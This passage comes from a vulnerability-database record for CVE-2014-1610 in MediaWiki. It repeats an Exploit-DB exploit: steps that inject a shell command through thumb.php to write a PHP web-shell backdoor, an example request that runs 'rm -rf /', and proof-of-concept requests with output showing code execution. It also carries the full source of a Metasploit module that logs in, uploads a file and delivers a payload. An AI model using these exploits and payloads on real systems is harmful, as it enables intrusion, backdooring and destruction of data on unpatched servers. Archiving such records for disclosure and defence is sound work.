Research Group (Jan 19, 2014)\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\n# Affected website : Wikipedia.org and more !\n#\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\n# Release dates : Feb 1, 2014\n# Special Thanks to 2600 Thailand !\n#\n####################################################################\n\n# Exploit:\n####################################################################\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\nhttp://vulnerable-site/index.php/Special:Upload\n2. inject os cmd to upload a php-backdoor\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\n3. access to php-backdoor!\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\n4. happy pwning!!\n\n\n# Related files:\n####################################################################\nthumb.php <-- extract all _GET array to params\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\noptions\n/includes/media/ImageHandler.php\n/includes/GlobalFunctions.php\n/includes/filerepo/file/File.php\n\n# Vulnerability Analysis:\n####################################################################\n1. thumb.php\nThis script used to resize images if it is configured to be done\nwhen the web browser requests the image\n<? ...\n1.1 Called directly, use $_GET params\nwfThumbHandleRequest();\n1.2 Handle a thumbnail request via query parameters\nfunction wfThumbHandleRequest() {\n$params = get_magic_quotes_gpc()\n? array_map( 'stripslashes', $_GET )\n: $_GET; << WTF\n\nwfStreamThumb( $params ); // stream the thumbnail\n}\n1.3 Stream a thumbnail specified by parameters\nfunction wfStreamThumb( array $params ) {\n...\n$fileName = isset( $params['f'] ) ? 
$params['f'] : ''; // << puts\nuploaded.pdf file here\n...\n// Backwards compatibility parameters\nif ( isset( $params['w'] ) ) {\n$params['width'] = $params['w']; // << Inject os cmd here!\nunset( $params['w'] );\n}\n...\n$img = wfLocalFile( $fileName );\n...\n// Thumbnail isn't already there, so create the new thumbnail...\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\nby width/height\n...\n// Stream the file if there were no errors\n$thumb->streamFile( $headers );\n...\n?>\n2. /includes/filerepo/file/File.php\n<? ...\nfunction transform( $params, $flags = 0 ) { ...\n$handler = $this->getHandler(); // << PDF Handler\n...\n$normalisedParams = $params;\n$handler->normaliseParams( $this, $normalisedParams );\n...\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\n..\n?>\n3. /extensions/PdfHandler/PdfHandler_body.php\n<? ...\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\n...\n$width = $params['width'];\n...\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\nparameters\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\n-dLastPage={$page}\";\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\n$srcPath );\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\nargument\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\n$cmd .= \" 2>&1\";\n...\n$err = wfShellExec( $cmd, $retval );\n...\n?>\n4. /includes/GlobalFunctions.php\nExecute a shell command, with time and memory limits\n<? 
...\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\narray() ) {\n...\npassthru( $cmd, $retval ); // << Execute here!!\n\n# Proof-Of-Concept\n####################################################################\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\nHTTP/1.1\nHost: 127.0.0.1\nConnection: keep-alive\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\n\n<html><head><title>Error generating thumbnail</title></head>\n<body>\n<h1>Error generating thumbnail</h1>\n<p>\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\nconvert: option requires an argument `-resize' @\nerror/convert.c/ConvertImageCommand/2380.<br />\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\n\n</p>\n\n</body>\n</html>\n\n\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\nHost: 127.0.0.1\nConnection: keep-alive\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\n\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n\n# Back-end $cmd\n####################################################################\nGlobalFunctions.php : wfShellExec()\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\nsystem(\\\\$_GET[1]);\">images/longcat.php` 
-\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.14 (GNU/Linux)\n\niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU\nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf\nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1\nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2\nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb\nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv\nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh\nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt\nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ\nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan\nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR\n2LmeyQR2rzjBB7Sovvcn\n=ooEs\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T14:23:33", "description": "MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit. CVE-2014-1610. 
Webapps exploits for multiple platform", "published": "2014-02-01T00:00:00", "type": "exploitdb", "title": "MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-01T00:00:00", "id": "EDB-ID:31329", "href": "https://www.exploit-db.com/exploits/31329/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n####################################################################\r\n#\r\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\r\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\r\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\r\n# Affected website : Wikipedia.org and more !\r\n#\r\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\r\n# Release dates : Feb 1, 2014\r\n# Special Thanks to 2600 Thailand !\r\n#\r\n####################################################################\r\n\r\n# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n\r\n\r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n\r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. 
thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n\r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . 
wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? ...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n\r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n\r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n\r\n</p>\r\n\r\n</body>\r\n</html>\r\n\r\n\r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; 
my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n\r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n\r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU\r\nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf\r\nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1\r\nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2\r\nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb\r\nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv\r\nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh\r\nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt\r\nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ\r\nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan\r\nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR\r\n2LmeyQR2rzjBB7Sovvcn\r\n=ooEs\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31329/"}, {"lastseen": "2016-02-03T15:26:47", "description": "MediaWiki Thumb.php - Remote Command Execution. CVE-2014-1610. 
Remote exploits for multiple platform", "published": "2014-02-19T00:00:00", "type": "exploitdb", "title": "MediaWiki Thumb.php - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-19T00:00:00", "id": "EDB-ID:31767", "href": "https://www.exploit-db.com/exploits/31767/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. 
If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\r\\n\",\r\n 'PrependEncoder' => \"php -r \\\"\",\r\n 'AppendEncoder' => \"\\\"\"\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base MediaWiki path\", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, \"Target DjVu/PDF file (e.g target.djvu target.pdf)\", nil ]),\r\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '' ]),\r\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", '' ])\r\n ], self.class)\r\n end\r\n\r\n def get_version(body)\r\n meta_generator = 
get_html_value(body, 'meta', 'generator', 'content')\r\n\r\n unless meta_generator\r\n vprint_status(\"No META Generator tag on #{full_uri}.\")\r\n return nil, nil, nil\r\n end\r\n\r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status(\"#{meta_generator} detected.\")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status(\"Major:#{major} Minor:#{minor} Patch:#{patch}\")\r\n\r\n return major, minor, patch\r\n end\r\n\r\n return nil, nil, nil\r\n end\r\n\r\n def check\r\n uri = target_uri.path\r\n\r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n\r\n response = send_request_cgi!(opts)\r\n\r\n if opts['redirect_uri']\r\n vprint_status(\"Redirected to #{opts['redirect_uri']}.\")\r\n end\r\n\r\n unless response\r\n vprint_status(\"No response from #{full_uri}.\")\r\n return CheckCode::Unknown\r\n end\r\n\r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status(\"#{response.code} response received...\")\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n\r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n vprint_status(\"Received response code #{response.code} from #{full_uri}\")\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n uri = target_uri.path\r\n\r\n print_status(\"Grabbing version and login CSRF token...\")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n 
})\r\n\r\n unless response\r\n fail_with(Failure::NotFound, \"Failed to retrieve webpage.\")\r\n end\r\n\r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status(\"Windows platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status(\"Nix platform detected: #{server}.\")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n\r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n\r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n\r\n session_cookie = response.get_cookies\r\n\r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n\r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find login token. 
Is URI set correctly?\")\r\n else\r\n print_good(\"Retrieved login CSRF token.\")\r\n end\r\n\r\n print_status(\"Attempting to login...\")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n\r\n if login and login.code == 302\r\n print_good(\"Log in successful.\")\r\n else\r\n fail_with(Failure::NoAccess, \"Failed to log in.\")\r\n end\r\n\r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n\r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n\r\n print_status(\"Getting upload CSRF token...\") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, \"Failed to access file upload page.\")\r\n end\r\n\r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n\r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, \"Couldn't find upload token. 
Is URI set correctly?\")\r\n elsif upload_csrf\r\n print_good(\"Retrieved upload CSRF token.\")\r\n end\r\n\r\n upload_mime = Rex::MIME::Message.new\r\n\r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, \"exploits\", \"cve-2014-1610\", \"metasploit.djvu\"))\r\n file_name = \"#{rand_text_alpha(4)}.djvu\"\r\n\r\n upload_mime.add_part(djvu_file, \"application/octet-stream\", \"binary\", \"form-data; name=\\\"wpUploadFile\\\"; filename=\\\"#{file_name}\\\"\")\r\n upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\r\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\r\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\r\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\r\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\r\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\r\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\r\n post_data = upload_mime.to_s\r\n\r\n print_status(\"Uploading DjVu file #{file_name}...\")\r\n\r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good(\"File uploaded to #{location}\")\r\n else\r\n if upload.body.include? 
'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\r\n end\r\n end\r\n\r\n payload_request(uri, file_name, my_platform)\r\n end\r\n\r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = \"1)&(#{payload.encoded})&\"\r\n else\r\n trigger = \"1;#{payload.encoded};\"\r\n end\r\n\r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\r\n end\r\n\r\n print_status(\"Sending payload request...\")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n\r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error(\"File: #{file_name} does not exist.\")\r\n elsif r\r\n print_error(\"Received response #{r.code}, exploit probably failed.\")\r\n end\r\n end\r\n\r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n\r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n\r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n\r\n ''\r\n end\r\nend\r\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31767/"}], "dsquare": 
[{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "description": "MediaWiki contains a flaw that is due to the program failing to properly sanitize input passed via the \"page\" parameter in the thumb.php script. This may allow a remote attacker to inject arbitrary shell commands.\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2014-05-19T00:00:00", "id": "E-382", "href": "", "type": "dsquare", "title": "MediaWiki thumb.php page Parameter Remote Shell Command Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-08T00:35:09", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote unauthenticated users to execute arbitrary commands via shell metacharacters. 
